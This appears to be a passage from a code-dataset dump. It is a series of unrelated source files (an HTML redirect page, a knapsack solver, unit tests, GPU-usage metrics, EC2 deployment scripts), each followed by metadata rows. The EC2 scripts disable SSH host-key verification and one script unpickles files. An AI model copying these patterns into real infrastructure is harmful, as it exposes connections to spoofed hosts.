animation-iteration-count: infinite;
/**
* This makes sure that the starting style (opacity: .2)
* of the animation is applied before the animation starts.
* Otherwise we would see a short flash or would have
* to set the default styling of the dots to the same
* as the animation. Same applies for the ending styles.
*/
animation-fill-mode: both;
}
.saving span:nth-child(2) {
/**
* Starts the animation of the third dot
* with a delay of .2s, otherwise all dots
* would animate at the same time
*/
animation-delay: .2s;
}
.saving span:nth-child(3) {
/**
* Starts the animation of the third dot
* with a delay of .4s, otherwise all dots
* would animate at the same time
*/
animation-delay: .4s;
}
</style>
<body>
<div class="bgimg w3-display-container w3-animate-opacity w3-text-white">
<div class="w3-display-topleft w3-padding-large w3-xlarge">
Enjoy your game!
</div>
<div class="w3-display-middle">
<h1 class="w3-jumbo w3-animate-top"> <strong><p class="saving">Loading <span>.</span><span>.</span><span>.</span></p> </strong></h1>
</div>
</div>
</body>
<script>
var timer = setTimeout(function() {
window.location='"""+foundry_url+"""'
}, 12000);
</script>
    </html>
    """ #XYZ - Edit the script's 12000 millisecond timer depending on your machine.
# This value determines how long the page waits before refreshing and hopefully redirecting the user to the Foundry login page
# (if it's too fast, the page will break and you will have to refresh until Foundry is turned on, too long... you just waste time.)
server=bottleManager()
| 33.516026 | 280 | 0.589557 | 1,281 | 10,457 | 4.712724 | 0.314598 | 0.009276 | 0.010933 | 0.019877 | 0.308597 | 0.264038 | 0.247143 | 0.228259 | 0.209376 | 0.209376 | 0 | 0.018476 | 0.29607 | 10,457 | 311 | 281 | 33.623794 | 0.801657 | 0.118772 | 0 | 0.430894 | 0 | 0.03252 | 0.491782 | 0.041145 | 0.004065 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.036585 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
48769d3fe736152c54bf8b09ad3360ea09bd2080 | 1,181 | py | Python | scripts/12865.py | JihoChoi/BOJ | 08974a9db8ebaa299ace242e951cac53ab55fc4d | [
"MIT"
] | null | null | null | scripts/12865.py | JihoChoi/BOJ | 08974a9db8ebaa299ace242e951cac53ab55fc4d | [
"MIT"
] | null | null | null | scripts/12865.py | JihoChoi/BOJ | 08974a9db8ebaa299ace242e951cac53ab55fc4d | [
"MIT"
] | null | null | null |
"""
TAG: 0-1 Knapsack Problem, Dynamic Programming (DP), O(nW)
References:
- https://www.geeksforgeeks.org/0-1-knapsack-problem-dp-10/
weights and values of n items, capacity -> max value
"""
N, W = map(int, input().split()) # number of items, capacity
weights = []
values = []
for i in range(N):
w, v = map(int, input().split())
weights.append(w)
values.append(v)
def knapsack(W, weights, values, n):
dp = [[0 for x in range(W+1)] for x in range(n+1)]
for i in range(n+1):
for w in range(W+1):
if i == 0 or w == 0:
dp[i][w] = 0
elif weights[i-1] <= w:
dp[i][w] = max(values[i-1] + dp[i-1][w - weights[i-1]], dp[i-1][w])
else:
dp[i][w] = dp[i-1][w]
return dp[n][W]
print(knapsack(W, weights, values, N))
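# Tiny worked example (added for illustration, not part of the original submission):
# with W=4 and items (weight, value) = (3, 4) and (2, 3), both items together weigh
# 5 > 4, so only one fits; the DP keeps the more valuable one and
#   knapsack(4, [3, 2], [4, 3], 2) == 4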
# Naive
"""
def knapsack(W, weights, values, n):
if n == 0 or W == 0: # base
return 0
if (weights[n-1] > W):
return knapsack(W, weights, values, n-1)
else:
return max(
values[n-1] + knapsack(W - weights[n-1], weights, values, n-1),
knapsack(W, weights, values, n-1)
)
"""
| 21.87037 | 83 | 0.516511 | 191 | 1,181 | 3.193717 | 0.246073 | 0.02623 | 0.157377 | 0.180328 | 0.337705 | 0.239344 | 0 | 0 | 0 | 0 | 0 | 0.035237 | 0.303133 | 1,181 | 53 | 84 | 22.283019 | 0.705954 | 0.187976 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0 | 0 | 0.105263 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
487c49f921ee4340fdfc140e8ff73bccf0d40cf6 | 3,273 | py | Python | test/broken_test_log.py | Brimizer/python-ant | 2b99693b4754156d401a0bd90e02357e8358c1f5 | [
"MIT"
] | null | null | null | test/broken_test_log.py | Brimizer/python-ant | 2b99693b4754156d401a0bd90e02357e8358c1f5 | [
"MIT"
] | null | null | null | test/broken_test_log.py | Brimizer/python-ant | 2b99693b4754156d401a0bd90e02357e8358c1f5 | [
"MIT"
] | 1 | 2019-01-11T22:22:06.000Z | 2019-01-11T22:22:06.000Z | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2011, Martín Raúl Villalba
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
##############################################################################
LOG_LOCATION = '/tmp/python-ant.logtest.ant'
import unittest
from ant.core.log import *
class LogReaderTest(unittest.TestCase):
def setUp(self):
lw = LogWriter(LOG_LOCATION)
lw.logOpen()
lw.logRead(b'\x01')
lw.logWrite(b'\x00')
lw.logRead(b'TEST')
lw.logClose()
lw.close()
self.log = LogReader(LOG_LOCATION)
def test_open_close(self):
self.assertTrue(self.log.is_open)
self.log.close()
self.assertFalse(self.log.is_open)
self.log.open(LOG_LOCATION)
self.assertTrue(self.log.is_open)
def test_read(self):
t1 = self.log.read()
t2 = self.log.read()
t3 = self.log.read()
t4 = self.log.read()
t5 = self.log.read()
self.assertEquals(self.log.read(), '')
self.assertEquals(t1[0], EVENT_OPEN)
self.assertTrue(isinstance(t1[1], int))
self.assertEquals(len(t1), 2)
self.assertEquals(t2[0], EVENT_READ)
self.assertTrue(isinstance(t1[1], int))
self.assertEquals(len(t2), 3)
self.assertEquals(t2[2], b'\x01')
self.assertEquals(t3[0], EVENT_WRITE)
self.assertTrue(isinstance(t1[1], int))
self.assertEquals(len(t3), 3)
self.assertEquals(t3[2], '\x00')
self.assertEquals(t4[0], EVENT_READ)
self.assertEquals(t4[2], 'TEST')
self.assertEquals(t5[0], EVENT_CLOSE)
self.assertTrue(isinstance(t1[1], int))
self.assertEquals(len(t5), 2)
class LogWriterTest(unittest.TestCase):
def setUp(self):
self.log = LogWriter(LOG_LOCATION)
def test_open_close(self):
self.assertTrue(self.log.is_open)
self.log.close()
self.assertFalse(self.log.is_open)
self.log.open(LOG_LOCATION)
self.assertTrue(self.log.is_open)
def test_log(self):
# Redundant, any error in log* methods will cause the LogReader test
# suite to fail.
pass
| 33.397959 | 78 | 0.633364 | 432 | 3,273 | 4.74537 | 0.354167 | 0.061463 | 0.026341 | 0.038049 | 0.299512 | 0.245854 | 0.245854 | 0.245854 | 0.245854 | 0.150244 | 0 | 0.019478 | 0.215704 | 3,273 | 97 | 79 | 33.742268 | 0.77912 | 0.355943 | 0 | 0.339623 | 0 | 0 | 0.026466 | 0.014011 | 0 | 0 | 0 | 0 | 0.433962 | 1 | 0.113208 | false | 0.018868 | 0.037736 | 0 | 0.188679 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4880ecda66e3c2c409be46833975599cd4502de6 | 641 | py | Python | doc/tutorial/getargs.py | OliverTED/doit | a6f75f312390aba352c3f00680cd32609323dbc2 | [
"MIT"
] | null | null | null | doc/tutorial/getargs.py | OliverTED/doit | a6f75f312390aba352c3f00680cd32609323dbc2 | [
"MIT"
] | 1 | 2018-10-02T19:28:08.000Z | 2018-10-02T19:28:08.000Z | doc/tutorial/getargs.py | smheidrich/doit | 1f9c3c755c96508ca2b1b2668f102f9d2da9c614 | [
"MIT"
] | null | null | null | DOIT_CONFIG = {'default_tasks': ['use_cmd', 'use_python']}
def task_compute():
def comp():
return {'x':5,'y':10, 'z': 20}
return {'actions': [(comp,)]}
def task_use_cmd():
return {'actions': ['echo x=%(x)s, z=%(z)s'],
'getargs': {'x': ('compute', 'x'),
'z': ('compute', 'z')},
'verbosity': 2,
}
def task_use_python():
return {'actions': [show_getargs],
'getargs': {'x': ('compute', 'x'),
'y': ('compute', 'z')},
'verbosity': 2,
}
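# Illustrative note (expected behaviour under stock doit getargs semantics; the exact
# output formatting is an assumption): running `doit` computes {'x': 5, 'y': 10, 'z': 20}
# once, then use_cmd echoes "x=5, z=20" and use_python calls show_getargs(5, 20),
# because 'y' in its getargs mapping is wired to compute's 'z'.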
def show_getargs(x, y):
print "this is x:%s" % x
print "this is y:%s" % y
| 24.653846 | 58 | 0.452418 | 79 | 641 | 3.531646 | 0.35443 | 0.075269 | 0.071685 | 0.114695 | 0.150538 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015873 | 0.312012 | 641 | 25 | 59 | 25.64 | 0.61678 | 0 | 0 | 0.2 | 0 | 0 | 0.26053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4883b0040e8dc5ec47ef273298b6d359bf3bcacc | 2,409 | py | Python | EasyRecycle/tests/unittests/core/views/test_BecomeCommercialAPIView.py | YuriyLisovskiy/EasyRecycle | 49f1b84931145a3e95224e411d22ed7701e5bfe0 | [
"MIT"
] | null | null | null | EasyRecycle/tests/unittests/core/views/test_BecomeCommercialAPIView.py | YuriyLisovskiy/EasyRecycle | 49f1b84931145a3e95224e411d22ed7701e5bfe0 | [
"MIT"
] | null | null | null | EasyRecycle/tests/unittests/core/views/test_BecomeCommercialAPIView.py | YuriyLisovskiy/EasyRecycle | 49f1b84931145a3e95224e411d22ed7701e5bfe0 | [
"MIT"
] | null | null | null | from django.urls import reverse
from rest_framework import status
from rest_framework.test import force_authenticate
from rest_framework_simplejwt.state import User
from core.views import DeactivateSelfAPIView, BecomeCommercialAPIView
from tests.unittests.common import APIFactoryTestCase
class BecomeCommercialAPITestCase(APIFactoryTestCase):
def setUp(self) -> None:
super(BecomeCommercialAPITestCase, self).setUp()
self.view = BecomeCommercialAPIView.as_view()
self.user = User.objects.get(username='User')
self.user_2 = User.objects.get(username='User2')
self.user_3 = User.objects.get(username='User3')
self.commercial_user = User.objects.get(username='Commercial')
def test_BecomeCommercialValid(self):
request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
'password': 'qwerty'
})
force_authenticate(request, self.user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(User.objects.get(username='User').is_commercial)
def test_BecomeCommercialInvalid(self):
request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
'password': 'qerty'
})
force_authenticate(request, self.user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_BecomeCommercialUnauthenticated(self):
request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
'password': 'qwerty'
})
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_BecomeCommercialNoData(self):
request = self.request_factory.put(reverse('api_v1:core:become_commercial'))
force_authenticate(request, self.user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_BecomeCommercialAlreadyCommercial(self):
request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
'password': 'qwerty'
})
force_authenticate(request, self.commercial_user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
| 42.263158 | 86 | 0.71565 | 264 | 2,409 | 6.329545 | 0.246212 | 0.09216 | 0.041891 | 0.065829 | 0.576302 | 0.527229 | 0.527229 | 0.527229 | 0.527229 | 0.527229 | 0 | 0.012214 | 0.184309 | 2,409 | 56 | 87 | 43.017857 | 0.838168 | 0 | 0 | 0.468085 | 0 | 0 | 0.094645 | 0.060191 | 0 | 0 | 0 | 0 | 0.12766 | 1 | 0.12766 | false | 0.085106 | 0.12766 | 0 | 0.276596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6f8edf6b803563f114318f388210647b9924420a | 11,263 | py | Python | avalanche/evaluation/metrics/gpu_usage.py | aishikhar/avalanche | 39c361aba1663795ed33f093ab2e15cc5792026e | [
"MIT"
] | 1 | 2021-08-11T19:43:38.000Z | 2021-08-11T19:43:38.000Z | avalanche/evaluation/metrics/gpu_usage.py | aishikhar/avalanche | 39c361aba1663795ed33f093ab2e15cc5792026e | [
"MIT"
] | null | null | null | avalanche/evaluation/metrics/gpu_usage.py | aishikhar/avalanche | 39c361aba1663795ed33f093ab2e15cc5792026e | [
"MIT"
] | 1 | 2021-04-09T08:10:27.000Z | 2021-04-09T08:10:27.000Z | ################################################################################
# Copyright (c) 2021 ContinualAI. #
# Copyrights licensed under the MIT License. #
# See the accompanying LICENSE file for terms. #
# #
# Date: 19-01-2021 #
# Author(s): Vincenzo Lomonaco, Lorenzo Pellegrini #
# E-mail: contact@continualai.org #
# Website: www.continualai.org #
################################################################################
import GPUtil
from threading import Thread
import time
import warnings
from typing import Optional, TYPE_CHECKING, List
from avalanche.evaluation import Metric, PluginMetric
from avalanche.evaluation.metric_results import MetricValue, MetricResult
from avalanche.evaluation.metric_utils import get_metric_name, \
phase_and_task, stream_type
if TYPE_CHECKING:
from avalanche.training import BaseStrategy
class MaxGPU(Metric[float]):
"""
The standalone GPU usage metric.
Important: this metric approximates the real maximum GPU percentage
usage since it sample at discrete amount of time the GPU values.
Instances of this metric keeps the maximum GPU usage percentage detected.
The `start_thread` method starts the usage tracking.
The `stop_thread` method stops the tracking.
    The result, obtained using the `result` method, is the maximum usage as a percentage.
    The reset method will bring the metric to its initial state. By default
    this metric in its initial state will return a usage value of 0.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the GPU usage metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
self.every = every
self.gpu_id = gpu_id
n_gpus = len(GPUtil.getGPUs())
if n_gpus == 0:
warnings.warn("Your system has no GPU!")
self.gpu_id = None
elif gpu_id < 0:
warnings.warn("GPU metric called with negative GPU id."
"GPU logging disabled")
self.gpu_id = None
else:
if gpu_id >= n_gpus:
warnings.warn(f"GPU {gpu_id} not found. Using GPU 0.")
self.gpu_id = 0
self.thread = None
"""
Thread executing GPU monitoring code
"""
self.stop_f = False
"""
Flag to stop the thread
"""
self.max_usage = 0
"""
Main metric result. Max GPU usage.
"""
def _f(self):
"""
Until a stop signal is encountered,
this function monitors each `every` seconds
the maximum amount of GPU used by the process
"""
start_time = time.monotonic()
while not self.stop_f:
# GPU percentage
gpu_perc = GPUtil.getGPUs()[self.gpu_id].load * 100
if gpu_perc > self.max_usage:
self.max_usage = gpu_perc
time.sleep(self.every - ((time.monotonic() - start_time)
% self.every))
def start_thread(self):
        if self.gpu_id is not None:
assert not self.thread, "Trying to start thread " \
"without joining the previous."
self.thread = Thread(target=self._f, daemon=True)
self.thread.start()
def stop_thread(self):
if self.thread:
self.stop_f = True
self.thread.join()
self.stop_f = False
self.thread = None
def reset(self) -> None:
"""
Resets the metric.
:return: None.
"""
self.max_usage = 0
def result(self) -> Optional[float]:
"""
Returns the max GPU percentage value.
        :return: The maximum GPU usage as a float percentage in range [0, 100].
"""
return self.max_usage
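# Minimal usage sketch for the standalone metric (illustrative only, not part of the
# original module):
#   gpu = MaxGPU(gpu_id=0, every=0.5)
#   gpu.start_thread()           # begin background sampling
#   ...                          # run the code to be monitored
#   gpu.stop_thread()
#   peak = gpu.result()          # maximum GPU load observed, as a percentage
#   gpu.reset()                  # back to the initial state (0)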
class MinibatchMaxGPU(PluginMetric[float]):
"""
The Minibatch Max GPU metric.
This plugin metric only works at training time.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the Minibatch Max GPU metric
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super().__init__()
self.gpu_id = gpu_id
self._gpu = MaxGPU(gpu_id, every)
def before_training(self, strategy: 'BaseStrategy') \
-> None:
self._gpu.start_thread()
def before_training_iteration(self, strategy: 'BaseStrategy') -> None:
self.reset()
def after_training_iteration(self, strategy: 'BaseStrategy') \
-> MetricResult:
return self._package_result(strategy)
def after_training(self, strategy: 'BaseStrategy') -> None:
self._gpu.stop_thread()
def reset(self) -> None:
self._gpu.reset()
def result(self) -> float:
return self._gpu.result()
def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
gpu_usage = self.result()
metric_name = get_metric_name(self, strategy)
plot_x_position = self.get_global_counter()
return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_MB"
class EpochMaxGPU(PluginMetric[float]):
"""
The Epoch Max GPU metric.
This plugin metric only works at training time.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the epoch Max GPU metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super().__init__()
self.gpu_id = gpu_id
self._gpu = MaxGPU(gpu_id, every)
def before_training(self, strategy: 'BaseStrategy') \
-> None:
self._gpu.start_thread()
def before_training_epoch(self, strategy) -> MetricResult:
self.reset()
def after_training_epoch(self, strategy: 'BaseStrategy') \
-> MetricResult:
return self._package_result(strategy)
def after_training(self, strategy: 'BaseStrategy') -> None:
self._gpu.stop_thread()
def reset(self) -> None:
self._gpu.reset()
def result(self) -> float:
return self._gpu.result()
def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
gpu_usage = self.result()
metric_name = get_metric_name(self, strategy)
plot_x_position = self.get_global_counter()
return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_Epoch"
class ExperienceMaxGPU(PluginMetric[float]):
"""
The Experience Max GPU metric.
This plugin metric only works at eval time.
"""
def __init__(self, gpu_id, every=0.5):
"""
        Creates an instance of the Experience Max GPU metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super().__init__()
self.gpu_id = gpu_id
self._gpu = MaxGPU(gpu_id, every)
def before_eval(self, strategy: 'BaseStrategy') \
-> None:
self._gpu.start_thread()
def before_eval_exp(self, strategy) -> MetricResult:
self.reset()
def after_eval_exp(self, strategy: 'BaseStrategy') \
-> MetricResult:
return self._package_result(strategy)
def after_eval(self, strategy: 'BaseStrategy') -> None:
self._gpu.stop_thread()
def reset(self) -> None:
self._gpu.reset()
def result(self) -> float:
return self._gpu.result()
def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
gpu_usage = self.result()
metric_name = get_metric_name(self, strategy, add_experience=True)
plot_x_position = self.get_global_counter()
return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_Experience"
class StreamMaxGPU(PluginMetric[float]):
"""
The Stream Max GPU metric.
This plugin metric only works at eval time.
"""
def __init__(self, gpu_id, every=0.5):
"""
        Creates an instance of the Stream Max GPU metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
super().__init__()
self.gpu_id = gpu_id
self._gpu = MaxGPU(gpu_id, every)
def before_eval(self, strategy) -> MetricResult:
self.reset()
self._gpu.start_thread()
def after_eval(self, strategy: 'BaseStrategy') \
-> MetricResult:
packed = self._package_result(strategy)
self._gpu.stop_thread()
return packed
def reset(self) -> None:
self._gpu.reset()
def result(self) -> float:
return self._gpu.result()
def _package_result(self, strategy: 'BaseStrategy') -> MetricResult:
gpu_usage = self.result()
phase_name, _ = phase_and_task(strategy)
stream = stream_type(strategy.experience)
metric_name = '{}/{}_phase/{}_stream' \
.format(str(self),
phase_name,
stream)
plot_x_position = self.get_global_counter()
return [MetricValue(self, metric_name, gpu_usage, plot_x_position)]
def __str__(self):
return f"MaxGPU{self.gpu_id}Usage_Stream"
def gpu_usage_metrics(gpu_id, every=0.5, minibatch=False, epoch=False,
experience=False, stream=False) -> List[PluginMetric]:
"""
Helper method that can be used to obtain the desired set of
plugin metrics.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
:param minibatch: If True, will return a metric able to log the minibatch
max GPU usage.
:param epoch: If True, will return a metric able to log the epoch
max GPU usage.
:param experience: If True, will return a metric able to log the experience
max GPU usage.
:param stream: If True, will return a metric able to log the evaluation
max stream GPU usage.
:return: A list of plugin metrics.
"""
metrics = []
if minibatch:
metrics.append(MinibatchMaxGPU(gpu_id, every))
if epoch:
metrics.append(EpochMaxGPU(gpu_id, every))
if experience:
metrics.append(ExperienceMaxGPU(gpu_id, every))
if stream:
metrics.append(StreamMaxGPU(gpu_id, every))
return metrics
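# Illustrative usage (a sketch; the EvaluationPlugin wiring is an assumption about the
# caller and is not defined in this module):
#   metrics = gpu_usage_metrics(gpu_id=0, every=0.5, epoch=True, experience=True)
#   evaluator = EvaluationPlugin(*metrics, loggers=[...])   # hypothetical caller code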
__all__ = [
'MaxGPU',
'MinibatchMaxGPU',
'EpochMaxGPU',
'ExperienceMaxGPU',
'StreamMaxGPU',
'gpu_usage_metrics'
]
| 29.717678 | 80 | 0.589097 | 1,310 | 11,263 | 4.868702 | 0.166412 | 0.03371 | 0.026811 | 0.018344 | 0.520853 | 0.492945 | 0.4873 | 0.473816 | 0.473816 | 0.473816 | 0 | 0.004622 | 0.308444 | 11,263 | 378 | 81 | 29.796296 | 0.814225 | 0.27435 | 0 | 0.502762 | 0 | 0 | 0.078166 | 0.019713 | 0 | 0 | 0 | 0 | 0.005525 | 1 | 0.226519 | false | 0 | 0.049724 | 0.060773 | 0.403315 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6f93e22cf26c9a478c3691514ddab933b92e050e | 280 | py | Python | scripts/test_process_traj.py | hyyh28/trajectory-transformer | 4a369b6d1c950c76d1792cf004644fa13040319c | [
"MIT"
] | null | null | null | scripts/test_process_traj.py | hyyh28/trajectory-transformer | 4a369b6d1c950c76d1792cf004644fa13040319c | [
"MIT"
] | null | null | null | scripts/test_process_traj.py | hyyh28/trajectory-transformer | 4a369b6d1c950c76d1792cf004644fa13040319c | [
"MIT"
] | null | null | null | import numpy as np
import pickle
expert_file = 'maze_expert.npy'
imitation_agent_file = 'maze_agent.npy'
with open(imitation_agent_file, 'rb') as handle:
agent_data = pickle.load(handle)
with open(expert_file, 'rb') as handle:
expert_data = pickle.load(handle)
print("OK") | 31.111111 | 48 | 0.757143 | 44 | 280 | 4.590909 | 0.431818 | 0.09901 | 0.178218 | 0.138614 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.128571 | 280 | 9 | 49 | 31.111111 | 0.827869 | 0 | 0 | 0 | 0 | 0 | 0.124555 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.222222 | 0 | 0.222222 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6f985fc4f5c199385b03c83c5b2b06f32b9bac8b | 3,475 | py | Python | ec2/physbam/utils.py | schinmayee/nimbus | 170cd15e24a7a88243a6ea80aabadc0fc0e6e177 | [
"BSD-3-Clause"
] | 20 | 2017-07-03T19:09:09.000Z | 2021-09-10T02:53:56.000Z | ec2/physbam/utils.py | schinmayee/nimbus | 170cd15e24a7a88243a6ea80aabadc0fc0e6e177 | [
"BSD-3-Clause"
] | null | null | null | ec2/physbam/utils.py | schinmayee/nimbus | 170cd15e24a7a88243a6ea80aabadc0fc0e6e177 | [
"BSD-3-Clause"
] | 9 | 2017-09-17T02:05:06.000Z | 2020-01-31T00:12:01.000Z | #!/usr/bin/env python
# Author: Omid Mashayekhi <omidm@stanford.edu>
import sys
import os
import subprocess
import config
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))
import ec2
temp_file_name = '_temp_file_'
def copy_binary_file_to_hosts(ip_addresses):
for ip in ip_addresses:
command = ''
command += ' scp -i ' + config.PRIVATE_KEY
command += ' -o UserKnownHostsFile=/dev/null '
command += ' -o StrictHostKeyChecking=no '
command += config.SOURCE_PATH + 'Water '
command += ' ubuntu@' + ip + ':' + config.REMOTE_PATH
subprocess.call(command, shell=True)
def collect_logs(ip_addresses):
subprocess.call(['rm', '-rf', config.OUTPUT_PATH])
subprocess.call(['mkdir', '-p', config.OUTPUT_PATH])
for ip in ip_addresses:
subprocess.Popen(['scp', '-q', '-r', '-i', config.PRIVATE_KEY,
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
'ubuntu@' + ip + ':' + config.FOLDER_PATH + 'mpi*.log',
config.OUTPUT_PATH])
subprocess.Popen(['scp', '-q', '-r', '-i', config.PRIVATE_KEY,
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
'ubuntu@' + ip + ':' + config.FOLDER_PATH + '*_lb_log.txt',
config.OUTPUT_PATH])
def clean_logs(ip_addresses):
command = ''
command += 'rm -rf ' + config.FOLDER_PATH + 'mpi*.log' + ';'
command += 'rm -rf ' + config.FOLDER_PATH + '*_lb_log.txt' + ';'
for ip in ip_addresses:
subprocess.Popen(['ssh', '-q', '-i', config.PRIVATE_KEY,
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
'ubuntu@' + ip, command])
def make_nodes_file_content(ip_addresses):
string = ""
for ip in ip_addresses:
print ip
string = string + ip + " cpu=8\n"
file = open(temp_file_name, 'w+')
file.write(string)
file.close()
def copy_nodes_file_to_hosts(ip_addresses):
make_nodes_file_content(ip_addresses)
for ip in ip_addresses:
command = ''
command += ' scp -i ' + config.PRIVATE_KEY
command += ' -o UserKnownHostsFile=/dev/null '
command += ' -o StrictHostKeyChecking=no '
command += temp_file_name
command += ' ubuntu@' + ip + ':' + config.REMOTE_PATH + config.NODES_FILE_NAME
subprocess.call(command, shell=True)
subprocess.call(['rm', temp_file_name])
def run_experiment(ip):
command = ''
command += ' ssh -i ' + config.PRIVATE_KEY
command += ' -o UserKnownHostsFile=/dev/null '
command += ' -o StrictHostKeyChecking=no '
command += ' ubuntu@' + ip
command += ' \"cd ' + config.REMOTE_PATH + '; '
command += ' mpirun -hostfile ' + config.NODES_FILE_NAME
command += ' -np ' + str(config.INSTANCE_NUM)
command += ' ./Water -scale ' + str(config.SCALE)
command += ' -e ' + str(config.FRAME_NUM) + '\" '
print command
subprocess.call(command, shell=True)
def collect_output_data(ip_addresses):
subprocess.call(['rm', '-rf', config.OUTPUT_NAME])
subprocess.call(['mkdir', '-p', config.OUTPUT_NAME])
process_num = 0
for ip in ip_addresses:
process_num += 1
command = ''
command += ' scp -r -i ' + config.PRIVATE_KEY
command += ' -o UserKnownHostsFile=/dev/null '
command += ' -o StrictHostKeyChecking=no '
command += ' ubuntu@' + ip + ':' + config.REMOTE_PATH + config.OUTPUT_NAME + str(process_num)
command += ' ' + config.OUTPUT_NAME
subprocess.call(command, shell=True)
